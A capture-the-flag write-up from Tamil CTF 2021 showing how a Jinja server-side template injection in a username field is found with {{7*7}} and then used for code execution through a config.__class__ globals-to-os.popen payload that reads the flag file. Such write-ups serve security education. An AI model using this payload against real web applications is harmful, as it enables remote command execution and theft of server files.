Rating: 5.0

Tamil CTF 2021 - Open Flag

Description:

What is open flag challenge ? I will tell the location of flag where its located, you just need to access that flag.

Finding the vulnerability:

The given website consists of 2 pages: A registration panel and a static page.

registration page

static page

We notice that upon entering a username it gets reflected on the static page. After trying to inject some payloads we notice that user input is not sanitized.

poc1

Therefore we can test the website for Server Side Template Injections. We discover that they use jinja templating engine. Using a simple payload like the one below we can confirm the vulnerability.

{{7*7}}

poc2

Solution:

Using the crafted payload below we can exploit the SSTI and get code execution.

{{config.__class__.__init__.__globals__['os'].popen('base64 flag.jpg').read()}}

This will reflect the flag image in the static html page base64 encoded. Save response in a txt file and decode with:

base64 -d flag.txt > flag.jpg

Flag is presented in the image.

flag

Happy hacking :)

Original writeup (https://github.com/apostolides/ctf-writeups/tree/master/TamilCTF_2021/Open_Flag).